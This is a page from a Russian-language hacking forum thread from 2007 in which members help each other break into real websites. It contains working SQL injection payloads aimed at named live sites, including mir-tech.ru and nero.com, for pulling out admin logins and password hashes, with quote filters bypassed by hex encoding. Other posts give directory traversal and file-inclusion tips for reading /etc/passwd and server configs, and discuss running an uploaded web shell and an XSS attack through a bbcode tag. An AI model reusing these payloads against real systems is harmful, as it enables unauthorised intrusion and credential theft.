Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    для начала попробуй так:
    Code:
    1+or+1=(SELECT+TOP+1+PassHash+from+admin where Login='твой логин')--
    но скорее всего так:
    Code:
    1+or+1=(SELECT+TOP+1+convert(int,PassHash%2b'%20qwerty')+from+admin)--
    в таком случае твой хеш это то что будет идти до qwerty
     
    1 person likes this.
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    1. да причем здесь твой аккаунт имелось ввиду логин который ты получил через скулю...
    2. тогда так попробуй (и чтоб вопросов не возникло смотри п.1):
    Code:
    1+or+1=(SELECT+TOP+1+convert(int,PassHash%2b'%20qw  erty')+from+admin where Login='логин который ты получил')--
    хотя точно тебе никто нескажет... остается угадывать, вот если б ты линк дал со скулей, тогда бы помогли скорее всего
     
    #82 Scipio, 25 Aug 2007
    Last edited: 25 Aug 2007
  3. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    значит первое значение passhash пустое... пробуй следующий логин...

    ЗЫ кстати тут convert() наверное не нужен
    ЗЗЫ Еслиб линк бы сразу дал, меньше бы флуда было
    ЗЗЗЫ Или в асю мне стучи... посмотрим че там...
     
    #83 Scipio, 25 Aug 2007
    Last edited: 25 Aug 2007
  4. Реджис

    Реджис Elder - Старейшина

    Joined:
    2 May 2007
    Messages:
    37
    Likes Received:
    28
    Reputations:
    5
    Доброго дня)
    Возникла проблема с заливкой шела в движке Insart.Content
    Имеется полный доступ к админке, есть возможность загрузки любых файлов, в том числе и *.php. Но, система отказывается выполнять код, а просто выводит его на экран => не полчается запустить шелл.
    Двиг на asp. Ссылку на загруженный шел формирует вида: getfile.asp?id={3AC9A519-4730-4C84-81AB-8A59A69A3F0C}
    Какие могут быть пути решения данной проблемы?
     
    3 people like this.
  5. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9
    Он имел виду логин который ты сам смог нарыть,администратора или ещё кого... ;)
     
    1 person likes this.
  6. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9
    У меня вопрос таков...
    На кое каком движке я обнаружел что ббтэг не соовсем написан правельно,и поэтому можно что то намутить.
    Поскольку я не спец,то решил посоветоватся тут.

    тэг [mp3]тут ссылка на файл[/mp3]

    возможно ставить любую ссылку,тоесть без начало http:// и без конца .mp3 .
    К примеру
    Code:
    [mp3]http://address.com/shell.php?hack=now[/mp3]
    в результате в коде сайта это выглядит так

    HTML:
    <embed autostart="false" loop="false" controller="true" width="220" height="42" src=http://address.com/shell.php?hack=http://address.com/shell.php?hack=now></embed>
    Ну а теперь вопрос,что можно с этим сделать ?

    P.S: все различные ковычки ( ' " < >) он фильтрует. но можно обойти ещё и через flash файлы. работает а так же ббтэг [swf]ссылка[/swf] .

    Где можно достать гид по созданию flash атаки,что бы работал с javascript .
     
    #86 Nazaret2005, 25 Aug 2007
    Last edited: 25 Aug 2007
  7. noisia

    noisia Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    20
    Likes Received:
    10
    Reputations:
    0
    Query failed: Table 'mobolan.config' doesn't exist

    оно само прописует mobolan, таблица конфиг точно есть!!!
     
  8. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    393
    Likes Received:
    694
    Reputations:
    405
    на запрос логина админа сервер выдал мне:

    Code:
    4Ruket&ebUSPaPhAf#stUchUthE4EBU+AVEq_dravEbREk$Zud#trat$us?EcaqE
    а на пароль:

    Code:
    az#NAf7A!uw9e&h#cHANej_pr*hupr-yaChe@$u!uthUthesabatRuQEq+4r&crU&
    Первый раз с этим столкнулся, вопрос, что ЭТО?
     
  9. mindw0rk

    mindw0rk Elder - Старейшина

    Joined:
    8 Jun 2007
    Messages:
    63
    Likes Received:
    50
    Reputations:
    1
    Есть вопрос по читалке файлов. Докопал я, значит, до http://site.com/index.php?ctr=../../index.php%00
    Выводится пустая страница только когда я пробую открыть сам индекс через него же.
    Показывает другие файлы из рут директории, но пхп файлы обрабатываются интерпретатором PHP. Вопросы -
    1 Возможно ли потянуть исходники пхп файлов?
    2 Как можно и возможно ли просмотреть содержимое директорий через этот dir trav?
    3 Чего стоящего стоит еще почитать на сервере кроме etc/passwd и логов баша?
    4 Есть ли альтернативный метод инклуда пхп файла, кроме как с нулевым байтом на конце, путем без расширения, с ? на конце и просто адресом к исходнику?
    5 Есть у кого набор самых часто используемых путей до /htdocs в юниксе?

    Буду оч признателен за подсказку.
     
  10. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Ничего странного, если, предположим, в index.php код <?php include $ctr; ?> , то результат вполне ожидаем.
    1. нет, если они с расширением php, с другими расширениями должно заинклудиться.
    2. как правило, нет. можно конечно написать эксплоит для этого инклуда, который будет брутить имена файлов, но это глупо.
    3. зависит от сервера. я бы порекомендовал залить шелл, почитав error.log (о том, как это сделать, читай на форуме). ну и конфиг апача (httpd.conf)
    4. ...
    5. смотри статью Единички "У природы нет плохой погоды", а также ищи на форуме.
     
  11. noisia

    noisia Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    20
    Likes Received:
    10
    Reputations:
    0
    http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFROMATION_SCHEMA.COLUMNS+where+table_name=main_users+limit+1,1/*

    почему??

    SELECT command denied to user 'u23390'@'10.10.223.240' for table 'COLUMNS'
     
  12. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    1) Ты ошибся, смотри ты написал INFROMATION_SCHEMA.COLUMNS, а надо INFORMATION_SCHEMA.COLUMNS

    2) Делать надо не так: table_name=main_users, а так: table_name='main_users', т.е. писать в кавычках.

    3) Но здесь кавычки фильтруются, но это легко обойти, написав название таблицы в хексах: 0x6d61696e5f7573657273

    В итоге должно выглядить так:

    Code:
    http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=0x6d61696e5f7573657273+limit+0,1/*
    P.S. Эта инъекция уже выкладывалась, юзай антибоян:

    http://antiboyansql.narod.ru/sql.txt
     
    #92 Grey, 27 Aug 2007
    Last edited: 28 Aug 2007
  13. noisia

    noisia Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    20
    Likes Received:
    10
    Reputations:
    0
    ?id=2+union+select+table_name,2,3,4+from+INFORMATION_SCHEMA.TABLES/*

    получаю

    Query failed : SELECT command denied to user 'metropo3_donban'

    helpppp
     
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Ну и че? чуть-чуть аглицкого заподло изучить?... не имеешь ты права такой запрос к БД использовать, отключена возможность, и такое бывает... а че ты хотел? (наверное бесплатный хостинг)
     
    #94 Scipio, 28 Aug 2007
    Last edited: 28 Aug 2007
  15. 4nob1oz

    4nob1oz Elder - Старейшина

    Joined:
    9 Jul 2007
    Messages:
    30
    Likes Received:
    22
    Reputations:
    0
    Как обычно тему удалили. Здорово вообще. Есть скуль на неро, вот линк http://www.nero.com/eng/showpress.php?id=-1+GROUP+BY+13/* юнион не пашет и пишет что ошибка в sql запросе хотя почему то group by нормально работает. Посмотрите скуль, скажите своё мнение.
     
    1 person likes this.
  16. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    2 4nob1oz

    Может быть версия скуля 3.x.x?
     
  17. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    И правда, версия MySQL 3.*
    Запрос, подтверждающий это:
    Code:
    http://www.nero.com/eng/showpress.php?id=100+and+substring(version(),1,1)=3
     
    1 person likes this.
  18. 4nob1oz

    4nob1oz Elder - Старейшина

    Joined:
    9 Jul 2007
    Messages:
    30
    Likes Received:
    22
    Reputations:
    0
    А как же тогда данные из базы выуживать без union, это же обьединение а если его нет то как достать данные то, таблиц то мы не знаем да и information_schema.tables тут и не пахнет конечно же. Я с мускулом 3 версии ниразу не работал. Как быть тогда?
     
  19. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    Ничего из него не вытащить, максимум можно узнать название базы данных, пользователя и ещё несколько системных переменных... К сржалению всё
     
  20. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    это blind sql-inject

    читай есть на форуме..
    например тут
    http://forum.antichat.ru/thread19844.html
    http://forum.antichat.ru/showpost.php?p=407227&postcount=3

    ну и конечно тут http://www.securitylab.ru/contest/212099.php?
     
    _________________________
    #100 halkfild, 28 Aug 2007
    Last edited: 28 Aug 2007
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.